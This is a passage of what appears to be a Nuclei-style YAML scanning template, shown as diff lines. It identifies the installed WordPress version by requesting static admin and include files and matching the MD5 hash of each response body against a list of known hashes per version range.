+ - "(\"5a7bd4909e9b554d9d6d14d8e3672f72\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.1 + dsl: + - "(\"1d74c489a7777d0fa6b226eccb151140\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - 
"(\"95d55f5d43ce4423cfeb1efcf61f6bcc\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"ab233bf82692d9cc49208b8fee6ee3fa\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"326108da685f0873de9fc07143688f1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e7915174a661686126042ac03ae03ed4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4fb1cd09a97e8c35fec738f6cdab3b99\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/comment.min.js" + matchers: + - type: dsl + name: 4.3 - 5.2.9 + dsl: + - "(\"8f3603ed0d77c4a1ae8f82dbd3159ed9\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"38ff692f79a3e57df9b9192a9e43b4ea\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"69354baaaebfb1acc18bbdd9b2b1fdb8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3146fd138614355e041e261a4294dc23\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"284349b341676993d9505326abc1f869\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"17e8c1774aa7ebd6e18181b77804f763\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/set-post-thumbnail.min.js" + matchers: + - type: dsl + name: 3.7 - 5.0.11 + dsl: + - "(\"8bc5ca12fa38a607d5af2181311b7a5b\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"62151e11b251bdda2295d9a8105e782a\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"927b30f924f2e11a7a78f63bb8d54393\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f037e26c97a0b05a4acc67e8cfeee01b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ba88585b7e0465b5de31f14e5a9aa60c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"31c250b54ebc48820839657f0bf24049\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/password-strength-meter.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"1aaa74a24aef982b82498717c1d1e6d1\" == 
md5(body))" + - type: dsl + name: 3.8 - 4.5.23 + dsl: + - "(\"3185f27c8fa4123db79a1d6de055c9d7\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"66ceeaf9fb0d3e36069cb2a5b4537787\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"fe72628809263f3d3dd7227053f9c9e5\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"7ffac3719681634d55315bb7020f0c35\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"831a0bdbf910b4139812e1327c992655\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a1dfc4ad5828bcc09702a4e6f1365550\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f9241f23581e39fc27e2542e36240eac\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"77395fe1e3d510014a30d65a1464d5bb\" == md5(body))" + - type: dsl + name: 3.8 - 4.7.19 + dsl: + - "(\"4cc64266f1b35a86c63cc1b2c42f7306\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"d39bc622e41df37d3f5e2e8fd20df836\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"43beb69ddff35f898e5b249f7b317ff1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"402b83d7eb8503875c7109fca9337099\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"a1db9e45185be361561f131088b9637b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"015e26faffb2e80008b37b867a15a3bf\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"97f0a4cdbc02ea3e9875ffa2ec6a0337\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"4b6388358177afb0bb33fe7bf256e3b4\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b4f6de1adf243fb1c4ca11109ca8358b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7e0f2194505d5542a2b80b0f0f08887c\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"3805f522ae8f28cc529ae905ccede61a\" == md5(body))" + - type: dsl + name: 4.9 - 
5.0.11 + dsl: + - "(\"92121be15064830078f19c7f912bc5f9\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"58a57f957959b2418cc05b8df844f546\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"52d5d3f67a30c1ce0f451f08aa5b97ff\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"de06009e78fc399ac9a91a8f59cd8e07\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5a621bf06d20c5c3572adbc7d71f2b97\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/code-editor.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4368208ec74f238fc80ef7dc47b2aba6\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"776a99fab6e282246f5133bc46d0087e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"48424898ce3f9ea8bb373f8653282650\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ac8c9bc9b09d4fdf6bbf06313403eeeb\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a4f21e1c4ea627dfbd09891525f9eef1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/plugin-install.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"46ac03875245e24a0d1be489b6cb4c2f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3229e9c737c2c9a012354905b57df8da\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7129ef20998c3f2812fec0a81fd4f705\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"83cad000ff1742f350cbf5263cdea97e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7a6211c90a9364fa26b36f9866d53e9e\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"e976956cebb7ba13ce258a9d2cfa8dc3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4c34cafa3f097dfd421dcc58356583e5\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"50652da46fc48b21ad901e98149bcd0c\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - 
"(\"19f4f7ff991851e77513e7d65c6b0430\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"783248774594b29ab9ebf6de3c9a38db\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"16ba1352fa10398697d8abdbeb096894\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"baba780d78f5d62abc5aad91f07d0c46\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"c10e07ae10cf119ed6c90ab69428e48d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"304eb11b47e86474942ddb5d2f6c5c91\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2a7c386a71ce6d34ef8dd27a5bb6ffec\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b05faafd50075d11d8a5771c0d489b09\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4f051762ba5719d75fa25627517bea54\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax-response.min.js" + matchers: + - type: dsl + name: 4.7 - 4.9.4 + dsl: + - "(\"d37497d8ac9cc91eacc91b76cbff30cc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"055515cf4b20352a05672b64161f8a02\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5e0c8cadb7abf2ef05fbb9c04f2513f5\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"f64f062c6a647e25c7fe883edb139121\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"6243173bbe7318aa7b1702a90c4b0ccb\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"c97811c969982d3ec60a885c16333372\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9bf9c718c9e841007b73e1f8194857b5\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1da637535cdded009a8dde077e234430\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"20d3d94221f3642fe34a6e578c435dcb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"53941ae215227db2556187ffa881e4ad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"e42f27d6179a5d518c8a5fd7c6685926\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a5a0ff7a47fe825bc38732ef1a9b530f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"be4b510a3e27fc2ea617dfe8d10530fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"00c7a8bf8a43b2a6342ae12d8014b357\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"4c62cfc657f2833b0ec9aef2aceda18d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"093f88e78124c68bbc7f81cc9664985e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9909906d58e1ba6307562901842b0f36\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"67cb8b12c345e8450f290f84bf99c983\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2988ea994f3223b637ed87efb015941a\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"fe929a23a43a921c573d6dec065f4697\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2d2b907716b25ae5cd508979a8eeacaf\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4cddab9fc231f895027cdcd60ff893ad\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"04343da85c5e00bae45912a244abffb3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-box.min.js" + matchers: + - type: dsl + name: 4.7.3 - 4.8.15 + dsl: + - "(\"abaa02b7bdeb06985ca76e06968b3f25\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"b1a623391a6e45e237c884963c3d86c5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1c02ad1f8935c4d4dce96815368a92e6\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"a446052ae0cf9947db74a78d2dfd1b1f\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"e5824b6ec80b938c3c17d7a19e78d9a9\" == 
md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"01b149cd42ae563cc462f7e81384da3d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"096b6a30f90cb435d1be8013ddc685ba\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6213cd28dc4288286091b04c2c276e7e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"580ffdf678912278549e642083a40302\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6c16b4618749725b12fe13abb7c42b2a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"dc0f235b74febea2c205db39d7359331\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/clipboard.min.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"aaae8ad0eeed6275f0ef60bcc496c4fc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8e6f346d35a9ca3d1189d623fff51b1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"28a0a9788fc1686ef67f7cdd72b8626d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"bbe1c0df780d9eb632ffa1bf16a1fa40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js" + matchers: + - type: dsl + name: 4.7 - 5.3.6 + dsl: + - "(\"bbe31109bb4a2955ac73c0b0ac1e8d8c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7dc53d12625ab07aae053c42d581a859\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d2b7eca9a8ae108ab66e5727394d236b\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"d4d46a49f3589ec1c136ab912a2da7ca\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b381c35db3e778ce91ddbf4a181d3428\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4513090604bf922d4ea86f931b979d8d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.3.6 + dsl: + - "(\"665ee57d23f6e1b6539fd1b0e62d31ab\" == 
md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bbdbfb09f97760f162e5e9b84733f059\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d4bbce6a05abc15f6708fa9bc8cc5f1e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.3.6 + dsl: + - "(\"720f7773fc0b0a8d79d4f3fc89658c1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"27c923c8f48e2d0888c43528fa449921\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d52e2371982ef4384ca54592d96e64d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/masonry.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"5420b6516c14245b504e7240a8310f2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"69717d4569676f401e97dcec54f10ebc\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"6cb8bb7d4daad1989037e36a0cf08e01\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"c54e75edf5cbaf412bc16ba4145f6032\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d58f7afc0296717c2a7a93b01b569b40\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3b3fc826e58fc554108e4a651c9c7848\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imagesloaded.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"d0c2c0d7e37652e66657c8c8d6376442\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"7e97ab52c3df75e9053002bb59f2cdd5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b89ed002fd8fa08062ac8018e5416432\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3a56752b736635bf69cb069b8818cbfd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-auth-check.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"99500dd54adc76769e1a798a9725d765\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + 
dsl: + - "(\"3fa71c823bf88630a96d37a0ce1ba695\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"a28190f5ed5d6bfa0702e414b65a2156\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"f1d3e9e205b2c0fecfd16283630f1a2b\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a72545bc4f0ec2779a259c397112efd5\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"d92e8027e527bd17fad278c48962d397\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"76d4ccd556604992cb9380661a893995\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"6a7bedfefa2ca4e2dd8dc7075d5b1363\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/admin-bar.js" + matchers: + - type: dsl + name: 4.3 - 5.0.11 + dsl: + - "(\"d97a1899a7f641e693928f5a47c33de4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"33030beb6f04ff00e3921848ba5bbf48\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"0f097d201cb02ea92c179103eae598e7\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"25692c16854d4f5fd7be2ff45a825da9\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e3614ae78ac77f5553cd2cea4fa45e4b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"87155dc1915f0d675ab45859c63c29eb\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"af5814becbee54d645db60be9ad5c3d4\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"49282a3221d1602842f7b8387fd8c7fc\" == md5(body))" + - type: dsl + name: 5.1 - 5.3 + dsl: + - "(\"6de7978f0a6608308e9156f4a357ce26\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"d2a25830f7004da7b426e628e4d3642a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c63460232611aa5c8aa280b134df07da\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a50de863f3edfff3a0f8a3e59a4070cd\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/js/password-strength-meter.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"2847576ec45293ab96dc0030974e2629\" == md5(body))" + - type: dsl + name: 3.8 - 4.5.23 + dsl: + - "(\"4d912846975670c9e2232a19ef7bb41b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9d7b4897e430c5470062141631ddf6cf\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"b3d62fe0166b74696d6bc96159abdccd\" == md5(body))" + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"fe72628809263f3d3dd7227053f9c9e5\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"21310235a8b2671858df84db50a44cb3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9fd543dc193265cafad84bd8a0d7f34d\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"5dabf5092e542062317b20b411e353ad\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"e95f7bfdde679787ce1dfa9ec54ea0fc\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"12680dac419ded545d7f0759cdef683b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"733ef96794bb51fc1d65de2df4938827\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/word-count.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"5c34b03b6ec23142fc52a77a51dbd00a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"7717109f8797a1b6cffcaccd2f69181f\" == md5(body))" + - type: dsl + name: 4.3 - 4.6.20 + dsl: + - "(\"40855d5cebe963ddaa0f92f1f5aeebb9\" == md5(body))" + - type: dsl + name: 3.8 - 4.2.29 + dsl: + - "(\"66256995400e51a5f931a11bc11e1e4e\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"86f1a330bd23226e1e7f50887e7f9ab0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bd315c9a2ccbf08260689037e63721ad\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"1f1fbcd7486060c4dbfdea32433cce24\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - 
"(\"a74398b6c7a69d86c66f1e2c2e763a36\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1c50ad62c2afa2b6a3b27f6389aa4f00\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"8041d069276b892b86066ef48173c94a\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a4dc4685332216c99b5efbcebf141d1a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e186134a25d7bf838c1cbb8dc3c10430\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"cb0d666642291b86e71d86f8fc85b196\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-custom-header.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6e62551d535dc3b007870e89f881ee21\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3e2d55e5318d81a5281421f688e58323\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"284b8547296847f3521f043cf87cdb34\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b6e71eabf6639d3cb46e2078d8467161\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"7f2b2cbe2196da8a4cd3ba7ecebd37bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-loader.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"3735895ce4bc1061b033b00ddadc22de\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7abf57ccc77b463cec220a6606154bc5\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"cc3c2444034208299c6df6cfc843e58a\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"2130932604d2718d1e9d11e800ab7e93\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"5c611eaec684f19737c160f5f01a485f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1378baafb8d7182238b30ec7c6e13022\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"a8081b20cf362f37400bea99ac2c844b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - 
"(\"3e18e99953ef2c5dbe445865119db950\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"db7600d0c3cd3ee2578d361ff5c81d19\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"a2c8b624e5fad7d54a01eb87471d66b0\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"43b25764a6f643073ba0e4152c6365a6\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"639a08feb527f2c543772254b8d48925\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"fa60be36fa14ef21ddd1d2837a0791c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-pointer.js" + matchers: + - type: dsl + name: 3.8 - 4.8.15 + dsl: + - "(\"35cb8b380bbd1f2eaa723ac49ba5f3f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9fb67c2257a8111e496014c2d2f3a930\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"44006ca7f608bdd5a0a6445d84dfa14d\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4a48a19acf10e63f33393a9d9909b3bd\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"35383aaf79e2b149c48a6acbc6c83809\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"7c3581af000bc58db4f8129ba6cd12b2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b295c27568ad8a9020144eed882b0067\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"491c51dd0c5bad0de219ce8bba0ada64\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-util.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"91c322750bc80f1cacfd4f991e65a415\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"705199da293ca7cfc6e98ea0b52774cb\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"b1f5d3eba80a1f93e0253bc74991fbb1\" == md5(body))" + - type: dsl + name: 3.8 - 4.0.32 + dsl: + - "(\"521d8ade2d01d0a2c99efa64416e11fb\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"84caa80dc10abf7a7ffd94c56cc38af1\" == 
md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3ec17cf08572d621367a0573351441aa\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"2c02aa97431dfcc81a82c8f83ab1cd3b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e09a8ad377e8a1ca3b8159a936c30906\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4d904aced6e332244a94fd2bacd3ec9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-widgets.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"436093edec320c9f9da76cee03deb3ac\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"fdeaa6b3ee156fd6aef890e09059efb6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"76d31132f6e296d08e381be0da448404\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"a01ebc7a7becb4597d71d379bcdab4be\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c0e6272abe698aa445a21298fa79c358\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"8ff9fe7ca1dadd92d11ffa20b353c518\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"7a62917d11fdead57427817f23871ad5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7fa89954900ede4d882ee21e63c2cb15\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"79827dedd0eb15f0ee788ac363c326b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"071db78449e52b5a8e4f74881f45ca76\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fddf44a35df34aa803d40aba646d7a6f\" == md5(body))" + - type: dsl + name: 